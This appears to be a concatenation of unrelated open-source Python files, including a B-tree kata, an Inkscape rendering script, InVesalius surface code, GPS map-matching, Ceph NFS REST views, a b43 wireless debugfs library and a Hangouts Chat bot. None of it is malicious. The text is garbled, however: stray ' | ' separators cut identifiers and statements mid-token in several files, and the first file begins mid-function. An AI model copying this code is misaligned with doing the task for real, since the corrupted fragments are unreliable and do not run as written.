if event_entry.level != 'E' or \
event_entry.key in [EventControl.EMAIL_TEST,
EventControl.EMAIL_SPIKE]:
# These events can always be emailed and don't count against
# the maximum.
return False
self._log_email(eventid)
self._prune() # Keep only the last email-looback-minutes rows
emails_sent_recently = self._recent_count()
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
logger.debug("email_limit: sent %d error emails in the last "
"%d minutes.",
emails_sent_recently, email_lookback_minutes)
email_max_count = self.system[SystemKeys.EMAIL_MAX_COUNT]
if emails_sent_recently > email_max_count:
# Don't sent this email alert
# send an alert that we're disabling email alerts
self._eventit()
# Disable email alerts
self.system[SystemKeys.ALERTS_ADMIN_ENABLED] = False
self.system[SystemKeys.ALERTS_PUBLISHER_ENABLED] = False
self.system[SystemKeys.EMAIL_SPIKE_DISABLED_ALERTS] = True
meta.commit()
return emails_sent_recently
# Send this email alert
return False
def _eventit(self):
"""Send the EMAIL-SPIKE event."""
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
email_max_count = self.system[SystemKeys.EMAIL_MAX_COUNT]
data = {'email_lookback_minutes': email_lookback_minutes,
'email_max_count': email_max_count}
self.server.event_control.gen(EventControl.EMAIL_SPIKE, data)
|
Alex-Diez/python-tdd-katas | b_tree_list_kata/day_10.py | Python | mit | 3,899 | 0 | import unittest
PAGE_SIZE = 16
class BtreeList(object):
def __init__(self):
self._root = Page(True)
def __iadd__(self, item):
right = self._root.add_item(item)
if right is not self._root:
left = self._root
self._root = Page(False)
self._root.add_page(left)
self._root.add_page(right)
return self
def __contains__(self, item):
return item in self._root
class Page(object):
def __init__(self, external):
self._entries = []
self._preallocate_entries()
self._size = 0
self._external = external
def _preallocate_entries(self):
for _ in range(PAGE_SIZE):
self._entries.append(None)
def __getitem__(self, index):
return self._entries[index]
def __setitem__(self, index, item):
self._entries[index] = item
def _is_full(self):
return self._size == 16
def add_item(self, item):
if self._external:
self._add_entry(Entry(item))
if self._is_full():
return self.split()
else:
index = self._page_for_item(item)
page = self[index] + item
if page is not self[index].page():
left, right = self.add_page(page)
if right is not None:
return right
else:
return left
return self
def _page_for_item(self, item):
for index in range(self._size):
if self[index] > item:
return index - 1
| return self._size - 1
def add_page(self, page):
self._add_entry(Entry(page[0].key(), page))
if self._is_full():
return self, self.split()
else:
return self, None
def _add_entry(self, entry):
self[self._size] = entry
self._size += 1
def __contains__(self, item):
if self._external:
| return any(self[:self._size])
else:
index = self._page_for_item(item)
return item in self[index]
def split(self):
half = self._size // 2
page = Page(self._external)
for index in range(half, self._size):
if self._external:
page.add_item(self[index].key())
else:
page.add_page(self[index].page())
self[index] = None
self._size = half
return page
class Entry(object):
def __init__(self, key, page=None):
self._key = key
self._page = page
def __eq__(self, item):
return self._key == item
def __gt__(self, item):
return self._key > item
def __contains__(self, item):
return item in self._page
def __add__(self, item):
return self._page.add_item(item)
def key(self):
return self._key
def page(self):
return self._page
class BtreeListTest(unittest.TestCase):
def setUp(self):
self.list = BtreeList()
def testListContainsManyAddedValues(self):
self.list += 1
self.list += 2
self.list += 3
self.assertTrue(1 in self.list)
self.assertTrue(2 in self.list)
self.assertTrue(3 in self.list)
def testListContainsMoreThanPage(self):
for i in range(PAGE_SIZE + 1):
self.list += i
for i in range(PAGE_SIZE + 1):
self.assertTrue(i in self.list)
def testListContainsMoreThanOneLevel(self):
for i in range(PAGE_SIZE ** 2 + 1):
self.list += i
for i in range(PAGE_SIZE ** 2 + 1):
self.assertTrue(i in self.list)
def testListContainsHugeNumberOfAddedValues(self):
for i in range(PAGE_SIZE ** 4 + 1):
self.list += i
for i in range(PAGE_SIZE ** 4 + 1):
self.assertTrue(i in self.list)
|
solus-cold-storage/evopop-gtk-theme | src/render-gtk3-assets.py | Python | gpl-3.0 | 5,791 | 0.001554 | #!/usr/bin/python3
# Thanks to the GNOME theme nerds for the original source of this script
import os
import sys
import xml.sax
import subprocess
INKSCAPE = '/usr/bin/inkscape'
OPTIPNG = '/usr/bin/optipng'
MAINDIR = '../EvoPop'
SRC = os.path.join('.', 'gtk3')
inkscape_process = None
def optimize_png(png_file):
if os.path.exists(OPTIPNG):
process = subprocess.Popen([OPTIPNG, '-quiet', '-o7', png_file])
process.wait()
def wait_for_prompt(process, command=None):
if command is not None:
process.stdin.write((command+'\n').encode('utf-8'))
# This is kinda ugly ...
# Wait for just a '>', or '\n>' if some other char appearead first
output = process.stdout.read(1)
if output == b'>':
return
output += process.stdout.read(1)
while output != b'\n>':
output += process.stdout.read(1)
output = output[1:]
def start_inkscape():
process = subprocess.Popen(
[INKSCAPE, '--shell'],
bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
wait_for_prompt(process)
return process
def inkscape_render_rect(icon_file, rect, output_file):
global inkscape_process
if inkscape_process is None:
inkscape_process = start_inkscape()
wait_for_prompt(inkscape_process,
'%s -i %s -e %s' %
(icon_file, rect, output_file))
optimize_png(output_file)
class ContentHandler(xml.sax.ContentHandler):
ROOT = 0
SVG = 1
LAYER = 2
OTHER = 3
TEXT = 4
def __init__(self, path, force=False, filter=None):
self.stack | = [self.ROOT]
self.inside = [self.ROOT]
self.path = path
self.rects = []
self.state = self.ROOT
self.chars = ""
self.force = force
self.filter = filter
def endDocument(self):
pass
def startElement(self, name, attrs):
if self.inside[-1] == self.ROOT:
if name == "svg":
self.stack.append(self.SVG)
self.inside.append(self.SVG)
return
elif | self.inside[-1] == self.SVG:
if (name == "g" and ('inkscape:groupmode' in attrs) and ('inkscape:label' in attrs)
and attrs['inkscape:groupmode'] == 'layer' and attrs['inkscape:label'].startswith('Baseplate')):
self.stack.append(self.LAYER)
self.inside.append(self.LAYER)
self.context = None
self.icon_name = None
self.rects = []
return
elif self.inside[-1] == self.LAYER:
if name == "text" and ('inkscape:label' in attrs) and attrs['inkscape:label'] == 'context':
self.stack.append(self.TEXT)
self.inside.append(self.TEXT)
self.text = 'context'
self.chars = ""
return
elif name == "text" and ('inkscape:label' in attrs) and attrs['inkscape:label'] == 'icon-name':
self.stack.append(self.TEXT)
self.inside.append(self.TEXT)
self.text = 'icon-name'
self.chars = ""
return
elif name == "rect":
self.rects.append(attrs)
self.stack.append(self.OTHER)
def endElement(self, name):
stacked = self.stack.pop()
if self.inside[-1] == stacked:
self.inside.pop()
if stacked == self.TEXT and self.text is not None:
assert self.text in ['context', 'icon-name']
if self.text == 'context':
self.context = self.chars
elif self.text == 'icon-name':
self.icon_name = self.chars
self.text = None
elif stacked == self.LAYER:
assert self.icon_name
assert self.context
if self.filter is not None and not self.icon_name in self.filter:
return
print (self.context, self.icon_name)
for rect in self.rects:
width = rect['width']
height = rect['height']
id = rect['id']
dir = os.path.join(MAINDIR, self.context)
outfile = os.path.join(dir, self.icon_name+'.png')
if not os.path.exists(dir):
os.makedirs(dir)
# Do a time based check!
if self.force or not os.path.exists(outfile):
inkscape_render_rect(self.path, id, outfile)
sys.stdout.write('.')
else:
stat_in = os.stat(self.path)
stat_out = os.stat(outfile)
if stat_in.st_mtime > stat_out.st_mtime:
inkscape_render_rect(self.path, id, outfile)
sys.stdout.write('.')
else:
sys.stdout.write('-')
sys.stdout.flush()
sys.stdout.write('\n')
sys.stdout.flush()
def characters(self, chars):
self.chars += chars.strip()
if len(sys.argv) == 1:
if not os.path.exists(MAINDIR):
os.mkdir(MAINDIR)
print ('Rendering from SVGs in', SRC)
for file in os.listdir(SRC):
if file[-4:] == '.svg':
file = os.path.join(SRC, file)
handler = ContentHandler(file)
xml.sax.parse(open(file), handler)
else:
file = os.path.join(SRC, sys.argv[1] + '.svg')
if len(sys.argv) > 2:
icons = sys.argv[2:]
else:
icons = None
if os.path.exists(os.path.join(file)):
handler = ContentHandler(file, True, filter=icons)
xml.sax.parse(open(file), handler)
else:
print ("Error: No such file", file)
sys.exit(1)
|
anhstudios/swganh | data/scripts/templates/object/tangible/loot/simple_kit/shared_tumble_blender.py | Python | mit | 455 | 0.046154 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPR | OPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/loot/simple_kit/shared_tumble_blender.iff"
result.attribute_template_id = -1
result.stfName("loot_n","tumble_blender")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ## | ##
return result |
fabio-otsuka/invesalius3 | invesalius/data/surface.py | Python | gpl-2.0 | 35,564 | 0.003459 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import multiprocessing
import os
import plistlib
import random
import tempfile
import weakref
import vtk
import wx
from wx.lib.pubsub import pub as Publisher
import invesalius.constants as const
import invesalius.data.imagedata_utils as iu
import invesalius.data.polydata_utils as pu
import invesalius.project as prj
import invesalius.session as ses
import invesalius.data.surface_process as surface_process
import invesalius.utils as utl
import invesalius.data.vtk_utils as vu
from invesalius.data import cy_mesh
# TODO: Verificar ReleaseDataFlagOn and SetSource
class Surface():
"""
Represent both vtkPolyData and associated properties.
"""
general_index = -1
def __init__(self, index=None, name=""):
Surface.general_index += 1
if index is None:
self.index = Surface.general_index
else:
self.index = index
Surface.general_index -= 1
self.polydata = ''
self.colour = ''
self.transparency = const.SURFACE_TRANSPARENCY
self.volume = 0.0
self.area = 0.0
self.is_shown = 1
if not name:
self.name = const.SURFACE_NAME_PATTERN %(self.index+1)
else:
self.name = name
def SavePlist(self, dir_temp, filelist):
filename = 'surface_%d' % self.index
vtp_filename = filename + '.vtp'
vtp_filepath = os.path.join(dir_temp, vtp_filename)
pu.Export(self.polydata, vtp_filepath, bin=True)
filelist[vtp_filepath] = vtp_filename
surface = {'colour': self.colour,
'index': self.index,
'name': self.name,
'polydata': vtp_filename,
'transparency': self.transparency,
'visible': bool(self.is_shown),
'volume': self.volume,
'area': self.area,
}
plist_filename = filename + '.plist'
#plist_filepath = os.path.join(dir_temp, filename + '.plist')
temp_plist = tempfile.mktemp()
plistlib.writePlist(surface, temp_plist)
filelist[temp_plist] = plist_filename
return plist_filename
def OpenPList(self, filename):
sp = plistlib.readPlist(filename)
dirpath = os.path.abspath(os.path.split(filename)[0])
self.index = sp['index']
self.name = sp['name']
self.colour = sp['colour']
self.transparency = sp['transparency']
self.is_shown = sp['visible']
self.volume = sp['volume']
try:
self.area = sp['area']
except KeyError:
self.area = 0.0
self.polydata = pu.Import(os.path.join(dirpath, sp['polydata']))
Surface.general_index = max(Surface.general_index, self.index)
def _set_class_index(self, index):
Surface.general_index = index
# TODO: will be initialized inside control as it is being done?
class SurfaceManager():
"""
Responsible for:
- creating new surfaces;
- managing surfaces' properties;
- removing existing surfaces.
Send pubsub events to other classes:
- GUI: Update progress status
- volume_viewer: Sends surface actors as the are created
"""
def __init__(self):
self.actors_dict = {}
self.last_surface_index = 0
self.__bind_events()
def __bind_events(self):
Publisher.subscribe(self.AddNewActor, 'Create surface')
Publisher.subscribe(self.SetActorTransparency,
'Set surface transparency')
Publisher.subscribe(self.SetActorColour,
'Set surface colour')
Publisher.subscribe(self.OnChangeSurfaceName, 'Change surface name')
Publisher.subscribe(self.OnShowSurface, 'Show surface')
Publisher.subscribe(self.OnExportSurface,'Export surface to file')
Publisher.subscribe(self.OnLoadSurfaceDict, 'Load surface dict')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnSelectSurface, 'Change surface selected')
#----
Publisher.subscribe(self.OnSplitSurface, 'Split surface')
Publisher.subscribe(self.OnLargestSurface,
'Create surface from largest region')
Publisher.subscribe(self.OnSeedSurface, "Create surface from seeds")
Publisher.subscribe(self.OnDuplicate, "Duplicate surfaces")
Publisher.subscribe(self.OnRemove,"Remove surfaces")
Publisher.subscribe(self.UpdateSurfaceInterpolation, 'Update Surface Interpolation')
Publisher.subscribe(self.OnImportSurfaceFile, 'Import surface file')
def OnDuplicate(self, pubsub_evt):
selected_items = pubsub_evt.data
proj = prj.Project()
surface_dict = proj.surface_dict
for index in selected_items:
original_surface = surface_dict[index]
# compute copy name
name = original_surface.name
names_list = [surface_dict[i].name for i in surface_dict.keys()]
new_name = utl.next_copy_name(name, names_list)
# create new mask
self.CreateSurfaceFromPolydata(polydata = original_surface.polydata,
overwrite = False,
name = new_name,
colour = original_surface.colour,
transparency = original_surface.transparency,
volume = original_surface.volum | e,
area = original_surface.area)
def OnRemove(self, pubsub_evt):
selected_items = pubsub_evt.data
proj = prj.Project() |
old_dict = self.actors_dict
new_dict = {}
if selected_items:
for index in selected_items:
proj.RemoveSurface(index)
actor = old_dict[index]
for i in old_dict:
if i < index:
new_dict[i] = old_dict[i]
if i > index:
new_dict[i-1] = old_dict[i]
old_dict = new_dict
Publisher.sendMessage('Remove surface actor from viewer', actor)
self.actors_dict = new_dict
if self.last_surface_index in selected_items:
if self.actors_dict:
self.last_surface_index = 0
else:
self.last_surface_index = None
def OnSeedSurface(self, pubsub_evt):
"""
Create a new surface, based on the last selected surface,
using as reference seeds user add to surface of reference.
"""
points_id_list = pubsub_evt.data
index = self.last_surface_index
proj = prj.Project()
surface = proj.surface_dict[index]
new_polydata = pu.JoinSeedsParts(surface.polydata,
points_id_list)
index = self.CreateSurfaceFromPolydata(new_polydata)
Publisher.sendMessage('Show single surface', (index, True))
#self.Sh |
pedrocamargo/map_matching | map_matching/finding_network_links.py | Python | apache-2.0 | 3,468 | 0.005479 | #-------------------------------------------------------------------------------
# Name: Step 2 in map matching
# Purpose: Finds the links likely corresponding to each GPS ping
#
# Author: Pedro Camargo
#
# Created: 09/04/2017
# Copyright: (c) pcamargo 2017
# Licence: APACHE 2.0
#-------------------------------------------------------------------------------
import glob
import ntpath
import pandas as pd
from shapely.geometry import LineString, Point # Pip install shapely
from parameters import load_parameters
# Somewhat based on http://rexdouglass.com/fast-spatial-joins-in-python-with-a-spatial-index/
def find_network_links(trip, network):
veh_speed = -1
veh_azimuth = -1
poly = []
all | _lin | ks = []
for g, t in enumerate(trip.gps_trace.index):
# Collects all info on a ping
if trip.has_speed:
veh_speed = trip.gps_trace.at[t, 'speed']
if trip.has_azimuth:
veh_azimuth = trip.gps_trace.at[t, 'azimuth']
y = trip.gps_trace.at[t, 'latitude']
x = trip.gps_trace.at[t, 'longitude']
P = (x, y)
# Finds which links are likely to have been used
l = network.idx_links.intersection(P)
P = Point(x,y)
# Loops through them to make sure they are within the buffers
for j in l:
direc = network.links_df.dir[j]
graph_id = network.links_df.graph_ab[j]
if direc < 0:
graph_id = network.links_df.graph_ba[j]
if graph_id not in poly:
if P.within(network.buffers[j]):
if trip.has_azimuth:
azim = network.links_df.azim[j]
if direc < 0:
azim = reverse_azim(azim)
if check_if_inside(veh_azimuth, azim, network.azimuth_tolerance):
poly.append(graph_id)
all_links.append(int(j))
if direc == 0:
azim = reverse_azim(azim)
if check_if_inside(veh_azimuth, azim, network.azimuth_tolerance):
poly.append(network.links_df.graph_ba[j])
else:
poly.append(graph_id)
all_links.append(int(j))
if direc == 0:
poly.append(network.links_df.graph_ba[j])
trip.graph_links = poly
trip.used_links = all_links
def reverse_azim(azim):
if azim > 180:
return azim - 180
else:
return azim + 180
def check_if_inside(azimuth, polygon_azimuth, tolerance):
inside=False
# If checking the tolerance interval will make the angle bleed the [0,360] interval, we have to fix it
#In case the angle is too big
if polygon_azimuth + tolerance > 360:
if polygon_azimuth - tolerance > azimuth:
azimuth += 360
#In case the angle is too small
if polygon_azimuth-tolerance < 0:
polygon_azimuth += 360
if azimuth < 180:
azimuth += 360
if polygon_azimuth - tolerance <= azimuth <= polygon_azimuth + tolerance:
inside = True
# Several data points do NOT have an azimuth associated, so we consider the possibility that all the links are valid
if azimuth == 0:
inside = True
return inside
if __name__ == '__main__':
main()
|
openattic/openattic | backend/ceph_nfs/views/ganesha_mgr_view.py | Python | gpl-2.0 | 4,167 | 0.00144 | # -*- coding: utf-8 -*-
"""
* Copyright (c) 2017 SUSE LLC
*
* openATTIC is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2.
*
* This package is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
"""
import logging
from django.core.exceptions import ValidationError
from rest_framework.decorators import api_view
from rest_framework.response import Response
from deepsea import DeepSea
from ceph_nfs import tasks
try:
from ceph_nfs.cephfs_util import CephFSUtil
import cephfs as libcephfs
except ImportError:
CephFSUtil = None
from ceph_radosgw.rgw_client import RGWClient
from rest_client import RequestException
from ceph.models import CephCluster
from ceph.restapi import FsidContext
logger = logging.getLogger(__name__)
@api_view(['GET'])
def hosts(request):
return Response({'hosts': DeepSea.instance().nfs_get_hosts()})
@api_view(['GET'])
def fsals(request):
res = DeepSea.instance().nfs_get_fsals_available()
if 'CEPH' in res:
if not CephFSUtil:
res = [f for f in res if f != 'CEPH']
else:
cluster = FsidContext(request=request, module_name='ceph_nfs').cluster
try:
if not CephFSUtil.instance(cluster).status():
res = [f for f in res if f != 'CEPH']
except libcephfs.PermissionError:
res = [f for f in res if f != 'CEPH']
if 'RGW' in res:
try:
if not RGWClient.admin_instance().is_service_online():
res = [f for f in res if f != 'RGW']
if not RGWClient.admin_instance().is_system_user():
res = [f for f in res if f != 'RGW']
except (RGWClient.NoCredentialsException, RequestException):
res = [f for f in res if f != 'RGW']
return Response({'fsals': res})
@api_view(['GET'])
def status(request):
return Response(DeepSea.instance().nfs_status_exports())
@api_view(['POST'])
def deploy(request):
if 'host' in request.DATA:
host = request.DATA['host']
my_task = tasks.async_deploy_exports.delay(host)
else:
my_task = tasks.async_deploy_exports.delay()
logger.info("Scheduled deploy of NFS exports: taskqueue_id=%s", my_task.id)
return Response({'taskqueue_id': my_task.id})
@api_view(['POST'])
def stop(request):
if 'host' in request.DATA:
host = request.DATA['host']
my_t | ask = tasks.async_stop_expo | rts.delay(host)
logger.info("Scheduled stop of NFS exports for host=%s: taskqueue_id=%s", host, my_task.id)
else:
my_task = tasks.async_stop_exports.delay()
logger.info("Scheduled stop of NFS exports: taskqueue_id=%s", my_task.id)
return Response({'taskqueue_id': my_task.id})
@api_view(['GET'])
def ls_dir(request):
if 'root_dir' in request.GET:
root = request.GET['root_dir']
else:
root = "/"
if 'depth' in request.GET:
depth = int(request.GET['depth'])
else:
depth = 1
if depth > 5:
logger.warning("Limiting depth to maximum value of 5: input depth=%s", depth)
depth = 5
root = '{}/'.format(root) if not root.endswith('/') else root
try:
cluster = FsidContext(request=request, module_name='ceph_nfs').cluster
paths = CephFSUtil.instance(cluster).get_dir_list(root, depth)
paths = [p[:-1] for p in paths if p != root]
return Response({'paths': paths})
except libcephfs.ObjectNotFound, libcephfs.PermissionError:
return Response({'paths': []})
@api_view(['GET'])
def buckets(request):
if 'userid' not in request.GET:
raise ValidationError('No userid parameter provided')
try:
return Response({'buckets': RGWClient.instance(request.GET['userid']).get_buckets()})
except RequestException as e:
logger.error(e)
return Response({'buckets': []})
|
itsneo1990/sanic_blog | apps/user/__init__.py | Python | mit | 127 | 0 | # -*- coding:utf-8 -*- |
# __author__ = itsneo1990
import sanic
user_bp = sanic.Blueprint("user_blueprint", url_prefix='us | er')
|
FabianKnapp/nexmon | buildtools/b43/debug/libb43.py | Python | gpl-3.0 | 19,793 | 0.03193 | """
# b43 debugging library
#
# Copyright (C) 2008-2010 Michael Buesch <m@bues.ch>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
import re
import hashlib
from tempfile import *
# SHM routing values
B43_SHM_UCODE = 0
B43_SHM_SHARED = 1
B43_SHM_REGS = 2
B43_SHM_IHR = 3
B43_SHM_RCMTA = 4
class B43Exception(Exception):
pass
B43_MMIO_MACCTL = 0x120
B43_MMIO_PSMDEBUG = 0x154
B43_MACCTL_PSM_MACEN = 0x00000001
B43_MACCTL_PSM_RUN = 0x00000002
B43_MACCTL_PSM_JMP0 = 0x00000004
B43_MACCTL_PSM_DEBUG = 0x00002000
class B43PsmDebug:
"""Parse the contents of the PSM-debug register"""
def __init__(self, reg_content):
self.raw = reg_content
return
def getRaw(self):
"""Get the raw PSM-debug register value"""
return self.raw
def getPc(self):
"""Get the microcode program counter"""
return self.raw & 0xFFF
class B43:
"""Hardware access layer. This accesses the hardware through the debugfs interface."""
def __init__(self, phy=None):
debugfs_path = self.__debugfs_find()
# Construct the debugfs b43 path to the device
b43_path = debugfs_path + "/b43/"
if phy:
b43_path += phy
else:
# Get the PHY.
try:
phys = os.listdir(b43_path)
except OSError:
print "Could not find B43's debugfs directory: %s" % b43_path
raise B43Exception
if not phys:
print "Could not find any b43 device"
raise B43Exception
if len(phys) != 1:
print "Found multiple b43 devices."
print "You must call this tool with a phyX parameter to specify a device"
raise B43Exception
phy = phys[0]
b43_path += phy;
# Open the debugfs files
try:
self.f_mmio16read = file(b43_path + "/mmio16read", "r+")
self.f_mmio16write = file(b43_path + "/mmio16write", "w")
self.f_mmio32read = file(b43_path + "/mmio32read", "r+")
self.f_mmio32write = file(b43_path + "/mmio32write", "w")
self.f_shm16read = file(b43_path + "/shm16read", "r+")
self.f_shm16write = file(b43_path + "/shm16write", "w")
self.f_shm32read = file(b43_path + "/shm32read", "r+")
self.f_shm32write = file(b43_path + "/shm32write", "w")
except IOError, e:
print "Could not open debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
self.b43_path = b43_path
return
# Get the debugfs mountpoint.
def __debugfs_find(self):
mtab = file("/etc/mtab").read().splitlines()
regexp = re.compile(r"^[\w\-_]+\s+([\w/\-_]+)\s+debugfs")
path = None
for line in mtab:
m = regexp.match(line)
if m:
path = m.group(1)
break
if not path:
print "Could not find debugfs in /etc/mtab"
raise B43Exception
return path
def read16(self, reg):
"""Do a 16bit MMIO read"""
try:
self.f_mmio16read.seek(0)
self.f_mmio16read.write("0x%X" % reg)
self.f_mmio16read.flush()
self.f_mmio16read.seek(0)
val = self.f_mmio16read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def read32(self, reg):
"""Do a 32bit MMIO read"""
try:
self.f_mmio32read.seek(0)
self.f_mmio32read.write("0x%X" % reg)
self.f_mmio32read.flush()
self.f_mmio32read.seek(0)
val = self.f_mmio32read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def maskSet16(self, reg, mask, set):
"""Do a 16bit MMIO mask-and-set operation"""
try:
mask &= 0xFFFF
set &= 0xFFFF
self.f_mmio16write.seek(0)
self.f_mmio16write.write("0x%X 0x%X 0x%X" % (reg, mask, set))
self.f_mmio16write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def write16(self, reg, value):
"""Do a 16bit MMIO write"""
self.maskSet16(reg, 0, value)
return
def maskSet32(self, reg, mask, set):
"""Do a 32bit MMIO mask-and-set operation"""
try:
mask &= 0xFFFFFFFF
set &= 0xFFFFFFFF
self.f_mmio32write.seek(0)
self.f_mmio32write.write("0x%X 0x%X 0x%X" % (reg, mask, set))
self.f_mmio32write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def write32(self, reg, value):
"""Do a 32bit MMIO write"""
self.maskSet32(reg, 0, value)
return
def shmRead16(self, routing, offset):
"""Do a 16bit SHM read"""
try:
self.f_shm16read.seek(0)
self.f_shm16read.write("0x%X 0x%X" % (routing, offset))
self.f_shm16read.flush()
self.f_shm16read.seek(0)
val = self.f_shm16read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def shmMaskSet16(self, routing, offset, mask, set):
"""Do a 16bit SHM mask-and-set operation"""
try:
mask &= 0xFFFF
set &= 0xFFFF
self.f_shm16write.seek(0)
self.f_shm16write.write("0x%X 0x%X 0x%X 0x%X" % (routing, offset, mask, set))
self.f_shm16write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def shmWrite16(self, routing, offset, value):
"""Do | a 16bit SHM write"""
self.shmMaskSet16(routing, offset, 0, value)
return
def shmRead32(self, routing, offset):
"""Do a 32bit SHM read"""
try:
self.f_shm32read. | seek(0)
self.f_shm32read.write("0x%X 0x%X" % (routing, offset))
self.f_shm32read.flush()
self.f_shm32read.seek(0)
val = self.f_shm32read.read()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return int(val, 16)
def shmMaskSet32(self, routing, offset, mask, set):
"""Do a 32bit SHM mask-and-set operation"""
try:
mask &= 0xFFFFFFFF
set &= 0xFFFFFFFF
self.f_shm32write.seek(0)
self.f_shm32write.write("0x%X 0x%X 0x%X 0x%X" % (routing, offset, mask, set))
self.f_shm32write.flush()
except IOError, e:
print "Could not access debugfs file %s: %s" % (e.filename, e.strerror)
raise B43Exception
return
def shmWrite32(self, routing, offset, value):
"""Do a 32bit SHM write"""
self.shmMaskSet32(routing, offset, 0, value)
return
def getGprs(self):
"""Returns an array of 64 ints. One for each General Purpose register."""
ret = []
for i in range(0, 64):
val = self.shmRead16(B43_SHM_REGS, i)
ret.append(val)
return ret
def getLinkRegs(self):
"""Returns an array of 4 ints. One for each Link Register."""
ret = []
for i in range(0, 4):
val = self.read16(0x4D0 + (i * 2))
ret.append(val)
return ret
def getOffsetRegs(self):
"""Returns an array of 7 ints. One for each Offset Register."""
ret = []
for i in range(0, 7):
val = self.read16(0x4C0 + (i * 2))
ret.append(val)
return ret
def shmSharedRead(self):
"""Returns a string containing the SHM contents."""
ret = ""
for i in range(0, 4096, 4):
val = self.shmRead32(B43_SHM_SHARED, i)
ret += "%c%c%c%c" % (val & 0xFF,
(val >> 8) & 0xFF,
(val >> 16) & 0xFF,
(val >> 24) & 0xFF)
return ret
def getPsmDebug(self):
"""Read the PSM-debug register and return an instance of B43PsmDebug."""
val = self.read32(B43_MMIO_PSMDEBUG)
return B43PsmDebug(val)
def getPsmConditions(self):
"""This returns the contents of the programmable-PSM-conditions register."""
return self.read16(0x4D8)
def ucodeStop(self):
"""Unconditionally stop the microcode PSM. """
self.maskSet32(B43_MMIO_MACCTL, ~B43_MACCTL_PSM_RUN, 0)
return
def ucodeStart(self):
"""Unconditionally start the microcode PSM. This will restart the
microcode on t |
CraftSpider/CraftBin | Python/utils/interp/__init__.py | Python | apache-2.0 | 210 | 0.004762 | """
An API for registering interactive command line tools, with argument parsing
and event handl | ing
"""
from .commands import Command, GroupMixin, command
from .interpreter import Interpreter, Context
| |
gsuitedevs/hangouts-chat-samples | python/card-bot/main.py | Python | apache-2.0 | 9,379 | 0.000853 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=invalid-name
"""
Hangouts Chat bot that responds to events and messages from a room
synchronously. The bot formats the response using cards,
inserting widgets based upon the user's original input.
"""
import logging
from flask import Flask, render_template, request, json
app = Flask(__name__)
INTERACTIVE_TEXT_BUTTON_ACTION = "doTextButtonAction"
INTERACTIVE_IMAGE_BUTTON_ACTION = "doImageButtonAction"
INTERACTIVE_BUTTON_PARAMETER_KEY = "param_key"
BOT_HEADER = 'Card Bot Python'
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
event_data = request.get_json()
resp = None
# If the bot is removed from the space, it doesn't post a message
# to the space. Instead, log a message showing that the bot was removed.
if event_data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from %s', event_data['space']['name'])
return 'OK'
if event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'ROOM':
resp = {'text': ('Thanks for adding me to {}!'
.format(event_data['space']['name']))}
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'DM':
resp = {'text': ('Thanks for adding me to a DM, {}!'
.format(event_data['user']['displayName']))}
elif event_data['type'] == 'MESSAGE':
resp = create_card_response(event_data['message']['text'])
elif event_data['type'] == 'CARD_CLICKED':
action_name = event_data['action']['actionMethodName']
parameters = event_data['action']['parameters']
resp = respond_to_interactive_card_click(action_name, parameters)
logging.info(resp)
return json.jsonify(resp)
